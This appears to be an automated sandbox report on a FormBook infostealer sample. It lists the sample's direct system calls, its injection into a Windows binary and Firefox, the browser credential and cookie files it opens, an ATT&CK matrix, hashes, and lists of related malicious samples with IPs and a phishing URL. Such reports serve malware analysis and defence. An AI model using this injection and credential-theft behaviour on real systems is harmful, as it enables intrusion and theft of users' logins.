                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe NtOpenSection: Direct from: 0x77382E0C
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe NtQueryVolumeInformationFile: Direct from: 0x77382F2C
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe NtQuerySystemInformation: Direct from: 0x773848CC
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe NtReadVirtualMemory: Direct from: 0x77382E8C
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe NtCreateKey: Direct from: 0x77382C6C
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe NtClose: Direct from: 0x77382B6C
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe NtAllocateVirtualMemory: Direct from: 0x773848EC
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe NtQueryAttributesFile: Direct from: 0x77382E6C
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe NtSetInformationThread: Direct from: 0x77382B4C
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe NtTerminateThread: Direct from: 0x77382FCC
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe NtQueryInformationToken: Direct from: 0x77382CAC
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe NtOpenKeyEx: Direct from: 0x77382B9C
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe NtAllocateVirtualMemory: Direct from: 0x77382BEC
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe NtDeviceIoControlFile: Direct from: 0x77382AEC
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe NtCreateFile: Direct from: 0x77382FEC
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe NtOpenFile: Direct from: 0x77382DCC
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe NtProtectVirtualMemory: Direct from: 0x77377B2E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Memory written: C:\Users\user\Desktop\NFhRxwbegd.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Section loaded: NULL target: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Section loaded: NULL target: C:\Windows\SysWOW64\ieUnatt.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: NULL target: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe protection: read write
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: NULL target: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\ieUnatt.exe Thread register set: target process: 5024
                Source: C:\Windows\SysWOW64\ieUnatt.exe Thread APC queued: target process: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Process created: C:\Users\user\Desktop\NFhRxwbegd.exe "C:\Users\user\Desktop\NFhRxwbegd.exe"
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe Process created: C:\Windows\SysWOW64\ieUnatt.exe "C:\Windows\SysWOW64\ieUnatt.exe"
                Source: C:\Windows\SysWOW64\ieUnatt.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: gsolWhsjddFW.exe, 00000007.00000000.2473399494.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000007.00000002.4083532896.00000000014B1000.00000002.00000001.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000009.00000002.4084784385.00000000014F1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
                Source: gsolWhsjddFW.exe, 00000007.00000000.2473399494.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000007.00000002.4083532896.00000000014B1000.00000002.00000001.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000009.00000002.4084784385.00000000014F1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                Source: gsolWhsjddFW.exe, 00000007.00000000.2473399494.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000007.00000002.4083532896.00000000014B1000.00000002.00000001.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000009.00000002.4084784385.00000000014F1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                Source: gsolWhsjddFW.exe, 00000007.00000000.2473399494.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000007.00000002.4083532896.00000000014B1000.00000002.00000001.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000009.00000002.4084784385.00000000014F1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Queries volume information: C:\Users\user\Desktop\NFhRxwbegd.exe VolumeInformation
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match File source: 5.2.NFhRxwbegd.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.NFhRxwbegd.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000008.00000002.4085031615.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.2561213396.0000000001830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.2560447934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000009.00000002.4087823404.00000000052A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.2562570319.00000000026F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000002.4085165315.0000000004F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\ieUnatt.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\ieUnatt.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\ieUnatt.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\ieUnatt.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\ieUnatt.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\ieUnatt.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\ieUnatt.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\ieUnatt.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\ieUnatt.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match File source: 5.2.NFhRxwbegd.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.NFhRxwbegd.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000008.00000002.4085031615.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.2561213396.0000000001830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.2560447934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000009.00000002.4087823404.00000000052A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.2562570319.00000000026F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000002.4085165315.0000000004F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 2 File and Directory Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 113 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 2 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                [Behavior graph: ID 1588097, Sample: NFhRxwbegd.exe, Startdate: 10/01/2025, Architecture: WINDOWS, Score: 100]

Source | Detection | Scanner | Label
NFhRxwbegd.exe | 76% | Virustotal |
NFhRxwbegd.exe | 79% | ReversingLabs | ByteCode-MSIL.Backdoor.FormBook
NFhRxwbegd.exe | 100% | Avira | HEUR/AGEN.1305388
NFhRxwbegd.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1588097
Start date and time: 2025-01-10 21:29:16 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 16s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: NFhRxwbegd.exe (renamed because original name is a hash value)
Original Sample Name: d26c248791d7c1347e8e21257ad5522c1e47e26e054a59bc61a50133e5d180d6.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@11/9
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 131
• Number of non-executed functions: 327
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.45, 2.23.242.162, 52.149.20.212
• Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target gsolWhsjddFW.exe, PID 2948 because it is empty
• Report creation exceeded maximum time and may have missing disassembly code information.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                    No simulations
                                                                    • 13.228.81.39
                                                                    www.zoomlive.liveORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                    • 154.208.202.225
                                                                    www.kkpmoneysocial.topORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                    • 172.67.129.38
                                                                    DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                    • 172.67.129.38
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    MULTIBAND-NEWHOPEUS9MZZG92yMO.exeGet hashmaliciousFormBookBrowse
                                                                    • 209.74.79.41
                                                                    OVZizpEU7Q.exeGet hashmaliciousFormBookBrowse
                                                                    • 209.74.77.107
                                                                    J1VpshZJfm.exeGet hashmaliciousFormBookBrowse
                                                                    • 209.74.79.42
                                                                    NWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                                                                    • 209.74.79.42
                                                                    zE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                                                                    • 209.74.79.42
                                                                    KSts9xW7qy.exeGet hashmaliciousFormBookBrowse
                                                                    • 209.74.77.109
                                                                    rQuotation.exeGet hashmaliciousFormBookBrowse
                                                                    • 209.74.79.40
                                                                    TNT AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                                    • 209.74.64.189
                                                                    z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                    • 209.74.79.41
                                                                    ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                    • 209.74.77.107
                                                                    CLOUDFLARENETUS4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                    • 104.21.112.1
                                                                    http://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                    • 188.114.96.3
                                                                    ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                    • 104.21.48.1
                                                                    FUEvp5c8lO.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                    • 104.16.184.241
                                                                    http://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                    • 104.17.25.14
                                                                    hZbkP3TJBJ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 104.21.48.1
                                                                    348426869538810128.jsGet hashmaliciousStrela DownloaderBrowse
                                                                    • 162.159.61.3
                                                                    statement.docGet hashmaliciousKnowBe4Browse
                                                                    • 104.17.245.203
                                                                    http://url4619.blast.fresha.com/ls/click?upn=u001.G0bnNiVD8tDhPRdNyxjhDe6AC2ZUylxwA-2FPGy7qPBOFCUALhhiYANslkdkKDsOuTa2ZqT7n3N6bFcUrsV3ma3w-3D-3DiLPp_ykKDCurTiMzdScmvRsWtgHw-2Bx-2FsD8gtjZ2QYvaL9rQITVCU8DqQaupyP3UmfqTkykrcOULUqJB8vo6EwGC-2FXTrZZmpb9VysDXh-2Bs9eImE1UjAPhR388ASwoK2AP8BEYSRfU-2BeoIKBzUjhDstghksAsPKSpvEGafa0WwVUEqkryumMEQR7LzeuVihS6omMjDxWLWVMpRaOOynXHENqj69QJe59g4iFPytRm60mTk5xjXMgeEaRzFxoPJ4ml3mi0VzHAqUdjS3jfMBnOzPxHyb77YZzptZnuj5FOqVfelcRKxyeSqvYRwMU4ICLhbfcggUpY9RSJQ7f8uHQHGk5X2Upw-3D-3DGet hashmaliciousUnknownBrowse
                                                                    • 104.17.245.203
                                                                    https://glfbanks.com/Get hashmaliciousHTMLPhisherBrowse
                                                                    • 172.67.74.152
                                                                    ONEANDONE-ASBrauerstrasse48DEhttps://media.maxfs.de/Get hashmaliciousUnknownBrowse
                                                                    • 212.227.100.139
                                                                    miori.arm5.elfGet hashmaliciousUnknownBrowse
                                                                    • 217.174.247.149
                                                                    Onedrive Shared document.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                    • 77.68.14.124
                                                                    rHP_SCAN_DOCUME.exeGet hashmaliciousFormBookBrowse
                                                                    • 217.160.0.160
                                                                    https://www.boulderpeptide.org/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                    • 74.208.236.22
                                                                    https://nutricarm.es/wp-templates/f8b83.phpGet hashmaliciousUnknownBrowse
                                                                    • 212.227.149.251
                                                                    spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                    • 104.192.6.92
                                                                    mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                    • 213.165.79.98
                                                                    la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                                    • 94.143.136.202
                                                                    nshsh4.elfGet hashmaliciousMiraiBrowse
                                                                    • 217.72.194.9
                                                                    DXTL-HKDXTLTseungKwanOServiceHKfrosty.spc.elfGet hashmaliciousMiraiBrowse
                                                                    • 156.235.189.191
                                                                    sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                    • 154.218.87.90
                                                                    3.elfGet hashmaliciousUnknownBrowse
                                                                    • 45.194.232.108
                                                                    empsl.elfGet hashmaliciousMiraiBrowse
                                                                    • 156.235.189.142
                                                                    gmips.elfGet hashmaliciousMiraiBrowse
                                                                    • 156.235.189.157
                                                                    earm.elfGet hashmaliciousMiraiBrowse
                                                                    • 156.235.189.161
                                                                    sora.ppc.elfGet hashmaliciousUnknownBrowse
                                                                    • 156.235.189.130
                                                                    miori.spc.elfGet hashmaliciousUnknownBrowse
                                                                    • 45.197.112.87
                                                                    z0r0.sh4.elfGet hashmaliciousMiraiBrowse
                                                                    • 156.237.184.168
                                                                    2.elfGet hashmaliciousUnknownBrowse
                                                                    • 154.214.153.42
                                                                    No context
                                                                    No context
                                                                    Process:C:\Users\user\Desktop\NFhRxwbegd.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1216
                                                                    Entropy (8bit):5.34331486778365
                                                                    Encrypted:false
                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                    Malicious:true
                                                                    Reputation:high, very likely benign file
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                    Process:C:\Windows\SysWOW64\ieUnatt.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1239949490932863
                                                                    Encrypted:false
                                                                    SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                    MD5:271D5F995996735B01672CF227C81C17
                                                                    SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                    SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                    SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                    Malicious:false
                                                                    Reputation:high, very likely benign file
                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):7.710414643489114
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                    File name:NFhRxwbegd.exe
                                                                    File size:865'280 bytes
                                                                    MD5:7b4d6f3b6a3b509738048774b20fad27
                                                                    SHA1:4e96c226734aa7a5df5910efb87542bfb671674f
                                                                    SHA256:d26c248791d7c1347e8e21257ad5522c1e47e26e054a59bc61a50133e5d180d6
                                                                    SHA512:54e2e71c641c7e831420c8c8514d67fd2c3b2c3d56874f3b08ee5ec49467cf7cbe7d4f516d3e27a3f5d175bd4b366b11bb29adb5f3509e067865dcfbfbb0ed13
                                                                    SSDEEP:12288:RjlIpHtMPku+l0CPPmi7wTVPdP0MAUFcICqX+XSr50t9pMyvE0839:RjlIhSPd+pkTxd5cICqOXSF03u0c
                                                                    TLSH:B705DFC03B2AB711DEACB930857AEDB862541E747004B9E3AEDD3B57B6D91126E1CF10
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...h.Zg..............0......$.......,... ...@....@.. ....................................@................................
                                                                    Icon Hash:37c38329a3924d33
                                                                    Entrypoint:0x4d2cba
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x675A9D68 [Thu Dec 12 08:23:04 2024 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    add byte ptr [eax], al
                                                                    NameVirtual AddressVirtual Size Is in Section
